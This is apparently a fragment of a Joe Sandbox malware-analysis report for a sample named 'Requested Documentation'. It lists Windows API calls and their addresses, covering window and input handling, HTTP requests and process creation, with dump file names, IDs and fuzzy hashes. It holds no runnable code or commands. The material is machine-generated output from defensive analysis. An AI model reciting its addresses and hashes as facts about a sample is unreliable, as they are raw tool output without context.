                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A12C0C), ref: 009F8B6F
                                                                              • CoGetObject.OLE32(?,00000000,00A12C0C,?), ref: 009F8B92
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 009F8BA5
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009F8C25
                                                                              • VariantClear.OLEAUT32(?), ref: 009F8C35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              • Opcode ID: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
                                                                              • Instruction ID: d8687d368de9e5489b20024b7f710165e7843dfdb46e8ad2fb5de5e16373d58f
                                                                              • Opcode Fuzzy Hash: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
                                                                              • Instruction Fuzzy Hash: 67C137B1608309AFC740DF64C884A6BB7E9FF89348F00495DFA899B251DB71ED46CB52
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 009E7A6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: af493c2767caa8c4b16fc3b6a5565e06835365406d13ee0807229a821e76be5d
                                                                              • Instruction ID: 9c98c74df9ad2de550c7d7a5b90a28fa0af0c297fd10b231cb4b26ad72c40502
                                                                              • Opcode Fuzzy Hash: af493c2767caa8c4b16fc3b6a5565e06835365406d13ee0807229a821e76be5d
                                                                              • Instruction Fuzzy Hash: DEB19E7190424A9FDB12DFE5C884BBEB7B8EF49320F244469EA41EB341D734AD41CB92
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009E11F0
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E1204
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 009E120B
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E121A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 009E122C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1245
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1257
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E129C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12B1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
                                                                              • Instruction ID: 633c0cde0f44d79d0e9a2d33c26c3d44729546049ca9e1d9dc892846b2e20511
                                                                              • Opcode Fuzzy Hash: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
                                                                              • Instruction Fuzzy Hash: 21310179600348FFDB22DF91EC88FA937ADEB96311F104125FE10D62A0D7759D868B61
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0098FAA6
                                                                              • OleUninitialize.OLE32(?,00000000), ref: 0098FB45
                                                                              • UnregisterHotKey.USER32(?), ref: 0098FC9C
                                                                              • DestroyWindow.USER32(?), ref: 009C45D6
                                                                              • FreeLibrary.KERNEL32(?), ref: 009C463B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C4668
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
                                                                              • Instruction ID: 3185dcd23638fb37f3bd41a335032de653186798e5e986f48b7a4ac879e008d2
                                                                              • Opcode Fuzzy Hash: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
                                                                              • Instruction Fuzzy Hash: 54A15834B01212CFCB29EF14C9A5F69F368AF45710F5546ADE80AAB261DB30AD16CF91
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,009DA439), ref: 009DA377
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
                                                                              • Instruction ID: 00b0ddf5241b00a9cc31bc921c6a157511d6e8cfe32b4488e9c17196a502af7d
                                                                              • Opcode Fuzzy Hash: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
                                                                              • Instruction Fuzzy Hash: E891E830A44605ABCB08EFA0C441BEDFB79BF85304F54C51AE959A7341DF31AAA9CBD1
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00982EAE
                                                                                • Part of subcall function 00981DB3: GetClientRect.USER32(?,?), ref: 00981DDC
                                                                                • Part of subcall function 00981DB3: GetWindowRect.USER32(?,?), ref: 00981E1D
                                                                                • Part of subcall function 00981DB3: ScreenToClient.USER32(?,?), ref: 00981E45
                                                                              • GetDC.USER32 ref: 009BCD32
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009BCD45
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009BCD53
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009BCD68
                                                                              • ReleaseDC.USER32(?,00000000), ref: 009BCD70
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009BCDFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
                                                                              • Instruction ID: 9c482138d07e62e267663d89819ef601411b5b5331172c682441e81b1167ba39
                                                                              • Opcode Fuzzy Hash: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
                                                                              • Instruction Fuzzy Hash: 2971E375500209DFCF21DF64C984AEA7FB9FF89320F14467AED555A2A6C7318C82DB60
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F1A50
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009F1A7C
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009F1ABE
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009F1AD3
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1AE0
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009F1B10
                                                                              • InternetCloseHandle.WININET(00000000), ref: 009F1B57
                                                                                • Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
                                                                                • Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 2603140658-3916222277
                                                                              • Opcode ID: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
                                                                              • Instruction ID: 5695a2ac484b716dc0198f0fb0b04aea7866033495b64d00658bb8e2d39483f5
                                                                              • Opcode Fuzzy Hash: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
                                                                              • Instruction Fuzzy Hash: F5416CB150121CFFEB118F50CC89FBA7BACEB08355F00412AFA05AA155E7B59E458BE5
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A0F910), ref: 009F8D28
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A0F910), ref: 009F8D5C
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009F8ED6
                                                                              • SysFreeString.OLEAUT32(?), ref: 009F8F00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
                                                                              • Instruction ID: aec6b7569a862b353dbea1fab9d6d601c1d4352c08bd4399e35a0e277c97f140
                                                                              • Opcode Fuzzy Hash: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
                                                                              • Instruction Fuzzy Hash: 5AF11971A00209AFDF54EF94C884EBEB7B9FF89314F148458FA15AB251DB31AE46CB50
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009FF6B5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF848
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF86C
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8CE
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009FFA4A
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009FFA7C
                                                                              • CloseHandle.KERNEL32(?), ref: 009FFAAB
                                                                              • CloseHandle.KERNEL32(?), ref: 009FFB22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
                                                                              • Opcode ID: 98ce9159268b29e8194b1bcfc7e5eb5ce71522956035782e99469d02c5f56f5e
                                                                              • Instruction ID: 03725fd0aabe94c5fe6d091b4a6affaf365b0cf2d84d234ae6659b907060ef4b
                                                                              • Opcode Fuzzy Hash: 98ce9159268b29e8194b1bcfc7e5eb5ce71522956035782e99469d02c5f56f5e
                                                                              • Instruction Fuzzy Hash: 10E1B1316043059FCB14EF24C8A1B7ABBE5AF85354F18896DF9999B3A2DB30DC41CB52
                                                                              APIs
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B
                                                                                • Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4
                                                                                • Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 009E4D40
                                                                              • _wcscmp.LIBCMT ref: 009E4D5A
                                                                              • MoveFileW.KERNEL32(?,?), ref: 009E4D75
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
                                                                              • Instruction ID: 322f971fd966e2c25a38d5f0623f458175155e431f8e6fee15bc3e4654b5ce35
                                                                              • Opcode Fuzzy Hash: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
                                                                              • Instruction Fuzzy Hash: A25152B24083859BC725EBA4DC81ADFB3ECAF85750F40092EF589D3191EE34E588C766
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A086FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
                                                                              • Instruction ID: ac8a90732e8639cac9ce840676017f704cfd468089ee9de9555ee42e4623854c
                                                                              • Opcode Fuzzy Hash: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
                                                                              • Instruction Fuzzy Hash: FC51C53050024CBFDF209B68EC89FAD7BA4FB05764F604111F990E62E1CF7AA991CB58
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009BC2F7
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BC319
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009BC331
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009BC34F
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC370
                                                                              • DestroyIcon.USER32(00000000), ref: 009BC37F
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC39C
                                                                              • DestroyIcon.USER32(?), ref: 009BC3AB
                                                                                • Part of subcall function 00A0A4AF: DeleteObject.GDI32(00000000), ref: 00A0A4E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                              • String ID:
                                                                              • API String ID: 2819616528-0
                                                                              • Opcode ID: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
                                                                              • Instruction ID: 93ee1231c6ea9a64e196e69b0ccd9cd3d0d51972e113a279768e790ac6316ee1
                                                                              • Opcode Fuzzy Hash: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
                                                                              • Instruction Fuzzy Hash: 5F516974A00209AFDB20EF64CC45FAA7BF9EB59720F104528F952E72A0DB71ED91DB50
                                                                              APIs
                                                                                • Part of subcall function 009DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA84C
                                                                                • Part of subcall function 009DA82C: GetCurrentThreadId.KERNEL32 ref: 009DA853
                                                                                • Part of subcall function 009DA82C: AttachThreadInput.USER32(00000000,?,009D9683,?,00000001), ref: 009DA85A
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D968E
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D96AB
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009D96AE
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96B7
                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D96D5
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96D8
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96E1
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D96F8
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
                                                                              • Instruction ID: 1aab8fe49bba6099345a7a5264ba9ff95b3cd2b9abc2a44b67443734e941fd08
                                                                              • Opcode Fuzzy Hash: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
                                                                              • Instruction Fuzzy Hash: 9211CEB1950218BFF620ABA09C89F6A3A2DEB4C750F104426F744AB1A0C9F35C129AA4
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009D853C,00000B00,?,?), ref: 009D892A
                                                                              • HeapAlloc.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8931
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8946
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,009D853C,00000B00,?,?), ref: 009D894E
                                                                              • DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8951
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8961
                                                                              • GetCurrentProcess.KERNEL32(009D853C,00000000,?,009D853C,00000B00,?,?), ref: 009D8969
                                                                              • DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D896C
                                                                              • CreateThread.KERNEL32(00000000,00000000,009D8992,00000000,00000000,00000000), ref: 009D8986
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                               • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                              • String ID:
                                                                              • API String ID: 1957940570-0
                                                                              • Opcode ID: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
                                                                              • Instruction ID: 9962b2def6327e1ea956c1fc53e10416d2b5e137d110c0290af3f601086613f2
                                                                              • Opcode Fuzzy Hash: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
                                                                              • Instruction Fuzzy Hash: E001AC75240308FFE620EBA5DC49F673B6CEB89711F408521FB05DB691CA7098028A20
